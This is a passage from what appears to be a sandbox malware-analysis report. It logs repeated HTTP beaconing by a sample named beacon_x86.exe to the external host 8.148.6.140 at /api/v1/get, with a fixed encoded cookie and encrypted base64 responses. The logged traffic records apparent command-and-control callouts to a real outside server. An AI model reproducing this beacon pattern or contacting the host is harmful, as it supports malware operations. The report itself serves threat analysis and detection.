        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        56192.168.2.8497668.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:58.503348112 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:00.135533094 CET505INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:27:59 GMT
        Server: nginx
        Content-Length: 320
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 70 6f 45 6d 37 76 64 70 62 52 76 73 4b 76 73 58 70 62 79 4a 38 4b 55 68 54 4d 6d 2f 4f 54 63 33 57 6d 76 42 31 68 69 37 4b 37 5a 57 76 59 78 73 30 6e 65 63 41 55 50 6f 55 71 4a 75 50 39 72 6e 4a 78 65 68 6d 50 70 4e 62 7a 67 76 68 56 53 4c 38 63 62 63 6f 77 38 41 4f 49 32 4c 46 74 70 50 52 4f 31 69 39 5a 73 72 59 4a 4d 43 76 36 35 4f 73 76 36 70 38 31 41 5a 78 36 58 78 58 76 4c 54 41 6d 62 44 38 7a 46 71 77 37 6a 4a 56 43 48 68 7a 72 49 59 77 50 65 6a 65 4d 69 4f 61 41 6a 65 7a 68 46 4d 2f 76 57 49 64 56 6c 48 34 59 6c 72 6f 57 77 74 64 36 77 66 4c 6f 5a 4a 51 51 66 78 4b 35 55 50 4a 48 42 50 7a 55 6c 68 51 4b 6f 6b 4c 79 4e 52 6d 41 65 7a 55 36 49 34 63 50 74 6c 33 56 53 6f 4c 63 73 32 73 54 76 35 76 4c 51 6a 61 6d 4a 32 67 62 7a 6a 79 6d 52 55 2b 4a 63 62 59 69 61 36 51 6c 71 6f 51 38 2b 4d 39 54 38 62 6f 4e 69 50 64 77 52 4a 58 6a 30 65 63 43 43 79 33 37 31 69 43 42 79 34 62 39 6d 35 6a 48 4f 63 73 5a 78 58 37 39 59 43 63 68 35 50 64 7a 55 56
        Data Ascii: poEm7vdpbRvsKvsXpbyJ8KUhTMm/OTc3WmvB1hi7K7ZWvYxs0necAUPoUqJuP9rnJxehmPpNbzgvhVSL8cbcow8AOI2LFtpPRO1i9ZsrYJMCv65Osv6p81AZx6XxXvLTAmbD8zFqw7jJVCHhzrIYwPejeMiOaAjezhFM/vWIdVlH4YlroWwtd6wfLoZJQQfxK5UPJHBPzUlhQKokLyNRmAezU6I4cPtl3VSoLcs2sTv5vLQjamJ2gbzjymRU+JcbYia6QlqoQ8+M9T8boNiPdwRJXj0ecCCy371iCBy4b9m5jHOcsZxX79YCch5PdzUV


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        57192.168.2.8497678.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:00.305979013 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        58192.168.2.8497688.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:01.252206087 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        59192.168.2.8497698.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:05.376934052 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:06.357059002 CET421INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:06 GMT
        Server: nginx
        Content-Length: 236
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 7a 64 46 30 53 79 44 57 78 4d 36 6d 33 4d 59 6d 51 6c 75 55 37 72 61 41 66 6c 45 54 37 4c 63 75 35 58 78 35 41 36 6f 75 70 68 4e 70 50 4d 4b 76 75 45 31 57 62 2b 2b 37 37 4f 48 45 50 48 52 7a 4d 52 71 79 52 35 73 6e 6d 35 34 7a 79 77 73 62 70 50 37 48 77 6b 2b 64 47 73 30 47 33 74 36 63 57 46 52 6d 36 31 75 66 53 49 69 4a 71 31 71 43 46 72 59 63 53 6f 4b 6f 35 35 5a 39 42 45 66 57 52 35 35 33 52 56 42 54 6a 58 76 54 32 55 71 47 45 77 66 33 59 4e 51 54 58 51 75 39 6b 70 75 54 41 66 67 67 47 50 61 63 56 34 52 41 53 57 79 71 45 6b 43 64 36 45 5a 47 52 6f 70 4a 47 41 5a 6c 6b 37 47 2b 6d 6c 2f 75 73 51 4b 75 67 51 75 50 71 44 44 64 61 49 74 67 36 30 69 49 34 33 2b 79 64 33 76 7a 37 45 45 39 6b 45 6b 3d
        Data Ascii: zdF0SyDWxM6m3MYmQluU7raAflET7Lcu5Xx5A6ouphNpPMKvuE1Wb++77OHEPHRzMRqyR5snm54zywsbpP7Hwk+dGs0G3t6cWFRm61ufSIiJq1qCFrYcSoKo55Z9BEfWR553RVBTjXvT2UqGEwf3YNQTXQu9kpuTAfggGPacV4RASWyqEkCd6EZGRopJGAZlk7G+ml/usQKugQuPqDDdaItg60iI43+yd3vz7EE9kEk=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        60192.168.2.8497708.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:06.468558073 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        61192.168.2.8497718.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:07.561825037 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:08.570158958 CET505INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:08 GMT
        Server: nginx
        Content-Length: 320
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 48 30 45 38 69 61 69 37 77 68 2b 6b 4e 4e 2f 65 75 65 54 52 68 47 33 47 49 54 49 67 6c 53 75 4c 2b 37 53 4b 61 63 6d 4b 6a 78 59 35 76 61 7a 79 6e 38 76 55 53 61 77 61 61 6b 39 46 6b 69 34 55 67 63 53 68 36 64 50 65 53 6b 50 38 6a 49 64 62 67 71 79 78 57 34 48 53 64 75 42 73 74 56 7a 57 68 45 42 62 52 36 55 77 78 34 69 49 46 65 46 56 36 41 50 69 31 61 51 2b 57 6f 74 58 51 51 47 56 70 59 35 71 69 53 59 51 48 7a 6d 6c 5a 70 45 42 58 30 49 37 46 4a 58 75 61 58 70 61 6c 39 31 74 46 44 64 31 61 59 41 50 6f 76 49 42 37 2b 50 55 34 63 74 77 30 74 30 36 47 75 33 44 73 56 69 37 49 58 33 64 54 35 38 78 63 6e 4e 57 38 6f 4d 32 49 7a 6c 77 31 6e 52 36 37 41 53 79 37 39 38 58 6b 51 70 46 50 6f 79 56 4c 45 57 49 30 48 61 36 6c 39 55 62 62 42 53 6a 64 64 4a 2b 6b 77 62 42 6d 67 4e 37 38 31 30 34 45 75 6f 62 72 52 49 69 71 61 4f 5a 44 36 6c 49 37 62 73 4e 6f 6a 72 49 53 44 4a 65 37 2b 4f 63 39 75 6b 78 79 71 63 4b 42 4c 48 49 6a 50 47 43 39 4e 71 70 4a 37 6e 4c
        Data Ascii: H0E8iai7wh+kNN/eueTRhG3GITIglSuL+7SKacmKjxY5vazyn8vUSawaak9Fki4UgcSh6dPeSkP8jIdbgqyxW4HSduBstVzWhEBbR6Uwx4iIFeFV6APi1aQ+WotXQQGVpY5qiSYQHzmlZpEBX0I7FJXuaXpal91tFDd1aYAPovIB7+PU4ctw0t06Gu3DsVi7IX3dT58xcnNW8oM2Izlw1nR67ASy798XkQpFPoyVLEWI0Ha6l9UbbBSjddJ+kwbBmgN78104EuobrRIiqaOZD6lI7bsNojrISDJe7+Oc9ukxyqcKBLHIjPGC9NqpJ7nL


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        62192.168.2.8497728.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:08.702950954 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:10.308865070 CET272INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:10 GMT
        Server: nginx
        Content-Length: 88
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 37 5a 6b 38 6e 52 39 34 38 66 2f 52 48 4c 62 57 36 6a 36 78 48 59 4f 61 78 70 71 62 78 57 65 57 37 32 45 4a 58 4a 68 52 44 62 6c 38 33 68 57 65 77 4d 33 4f 34 38 48 43 36 58 76 61 4b 49 36 57 51 48 79 4a 4b 7a 55 47 78 42 51 30 6c 69 44 72 64 61 65 74 46 77 3d 3d
        Data Ascii: 7Zk8nR948f/RHLbW6j6xHYOaxpqbxWeW72EJXJhRDbl83hWewM3O48HC6XvaKI6WQHyJKzUGxBQ0liDrdaetFw==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        63192.168.2.8497738.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:10.424554110 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:11.395093918 CET377INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:11 GMT
        Server: nginx
        Content-Length: 192
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 57 75 2b 72 32 58 46 4d 7a 42 6b 72 48 31 72 41 7a 49 75 58 2f 65 35 4d 74 57 5a 49 47 43 66 58 48 52 57 4b 32 73 68 37 58 46 45 65 67 59 30 52 62 65 64 75 74 4e 66 74 67 35 46 69 48 34 64 37 4c 44 65 59 72 6e 2f 33 54 45 6b 2f 66 73 66 73 31 2f 32 46 4c 49 59 75 2f 2f 79 4b 39 31 54 42 53 68 50 44 54 45 6d 2b 56 63 46 63 52 47 37 54 6f 79 74 73 63 6b 56 35 4d 32 44 75 2b 57 53 63 59 71 39 2b 77 57 31 38 37 6d 4f 52 31 6c 39 6f 36 42 78 46 57 51 4b 31 45 41 33 7a 68 31 65 6a 43 6f 37 48 53 50 39 52 62 4f 51 45 4b 57 33 51 6a 2b 66 30 79 71 4b 7a 4e 4c 2f 55 72 69 64 35
        Data Ascii: Wu+r2XFMzBkrH1rAzIuX/e5MtWZIGCfXHRWK2sh7XFEegY0RbedutNftg5FiH4d7LDeYrn/3TEk/fsfs1/2FLIYu//yK91TBShPDTEm+VcFcRG7ToytsckV5M2Du+WScYq9+wW187mOR1l9o6BxFWQK1EA3zh1ejCo7HSP9RbOQEKW3Qj+f0yqKzNL/Urid5


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        64192.168.2.8497748.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:11.514879942 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        65192.168.2.8497758.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:12.517987013 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        66192.168.2.8497768.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:13.533879995 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:15.103058100 CET505INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:14 GMT
        Server: nginx
        Content-Length: 320
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 62 4b 55 30 57 79 52 5a 54 66 79 6c 66 71 56 50 4e 6e 47 30 56 68 4b 47 37 76 73 4f 59 55 73 42 53 47 70 6b 70 4a 30 43 70 4f 6e 4c 2f 39 64 56 4b 38 37 58 77 67 59 5a 41 77 7a 37 51 5a 64 36 6b 39 66 54 38 72 67 73 4d 43 48 6a 69 61 79 47 68 43 6b 4a 41 31 47 73 46 5a 31 56 57 6b 6d 6b 35 46 35 55 49 74 4e 48 72 36 32 5a 7a 61 59 51 4c 49 54 4b 65 42 44 58 59 39 7a 39 67 39 2b 49 39 41 73 38 62 59 66 34 35 4a 53 31 55 78 69 30 49 79 79 36 67 6f 79 78 64 71 79 67 43 51 67 55 71 63 6f 34 66 32 73 64 4d 6b 39 75 37 34 79 4c 6f 6d 7a 51 31 38 66 49 44 51 35 2b 64 69 58 71 70 65 71 51 78 36 64 43 4c 4c 78 46 46 5a 36 51 74 6f 50 6d 48 35 4a 2b 39 61 6b 46 63 4c 74 6d 6d 42 76 72 45 61 4c 38 44 66 6c 46 62 70 36 31 66 6a 4d 31 6f 73 59 6d 4c 64 57 30 49 74 64 55 68 2b 70 41 4b 62 4a 2f 4d 63 71 63 46 54 4a 34 4f 6c 32 54 4e 63 47 36 54 48 62 52 4c 31 74 76 7a 4a 74 32 46 74 47 73 6d 7a 56 46 41 36 4e 38 64 45 72 33 6d 63 31 6e 56 49 31 37 76 6c 2b 6a
        Data Ascii: bKU0WyRZTfylfqVPNnG0VhKG7vsOYUsBSGpkpJ0CpOnL/9dVK87XwgYZAwz7QZd6k9fT8rgsMCHjiayGhCkJA1GsFZ1VWkmk5F5UItNHr62ZzaYQLITKeBDXY9z9g9+I9As8bYf45JS1Uxi0Iyy6goyxdqygCQgUqco4f2sdMk9u74yLomzQ18fIDQ5+diXqpeqQx6dCLLxFFZ6QtoPmH5J+9akFcLtmmBvrEaL8DflFbp61fjM1osYmLdW0ItdUh+pAKbJ/McqcFTJ4Ol2TNcG6THbRL1tvzJt2FtGsmzVFA6N8dEr3mc1nVI17vl+j


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        67192.168.2.8497778.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:15.282443047 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        68192.168.2.8497788.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:16.250392914 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:17.234460115 CET293INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:17 GMT
        Server: nginx
        Content-Length: 108
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 44 67 6f 74 34 34 64 61 44 6c 37 42 55 38 39 7a 41 38 44 4a 66 41 55 39 64 76 32 67 57 4a 4c 38 61 44 36 62 38 77 6b 45 6f 46 63 64 34 70 4b 2f 6e 48 6e 57 70 4e 53 6c 6a 75 44 6b 30 4b 63 47 41 65 4d 6d 49 73 58 44 51 54 50 35 6a 46 39 7a 6c 4b 4e 68 6a 4a 73 49 6e 65 50 66 50 43 49 6a 6c 43 79 30 47 6f 30 67 79 69 55 3d
        Data Ascii: Dgot44daDl7BU89zA8DJfAU9dv2gWJL8aD6b8wkEoFcd4pK/nHnWpNSljuDk0KcGAeMmIsXDQTP5jF9zlKNhjJsInePfPCIjlCy0Go0gyiU=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        69192.168.2.8497798.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:17.374104023 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:18.357980967 CET441INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:18 GMT
        Server: nginx
        Content-Length: 256
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 35 38 39 45 44 7a 77 73 78 79 78 2b 70 43 63 5a 47 71 4b 74 50 6d 32 42 66 51 69 76 33 56 51 41 35 5a 41 32 53 4e 6d 37 6f 58 57 47 51 2b 62 74 49 47 71 51 48 65 66 67 34 50 2f 66 34 46 6a 46 49 42 7a 39 68 68 43 5a 66 6b 34 46 6b 4b 69 34 72 62 39 67 6b 6d 65 33 30 6f 4e 39 2b 41 42 30 68 2b 39 65 31 48 64 48 4f 30 74 44 4a 55 30 33 59 76 5a 44 50 56 41 7a 41 55 79 46 30 48 47 58 6d 36 4a 71 6a 6a 51 31 34 6e 6e 4a 78 4c 4e 6b 4d 67 31 6e 50 75 63 37 54 31 4d 38 49 64 72 33 68 69 68 75 50 47 44 4d 76 34 6e 61 75 59 58 49 65 4c 6e 74 6a 62 35 4f 67 6b 6b 69 66 73 36 78 6d 50 64 58 36 5a 6f 74 67 6b 44 6a 37 34 62 79 72 36 31 48 67 41 79 65 41 7a 41 66 6f 33 47 75 67 36 61 34 6b 50 6c 48 45 4c 34 45 30 36 54 32 6d 6d 6a 79 4d 4c 6d 57 51 66 5a 6b 65 65 67 68
        Data Ascii: 589EDzwsxyx+pCcZGqKtPm2BfQiv3VQA5ZA2SNm7oXWGQ+btIGqQHefg4P/f4FjFIBz9hhCZfk4FkKi4rb9gkme30oN9+AB0h+9e1HdHO0tDJU03YvZDPVAzAUyF0HGXm6JqjjQ14nnJxLNkMg1nPuc7T1M8Idr3hihuPGDMv4nauYXIeLntjb5Ogkkifs6xmPdX6ZotgkDj74byr61HgAyeAzAfo3Gug6a4kPlHEL4E06T2mmjyMLmWQfZkeegh


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        70192.168.2.8497808.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:18.499998093 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        71192.168.2.8497818.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
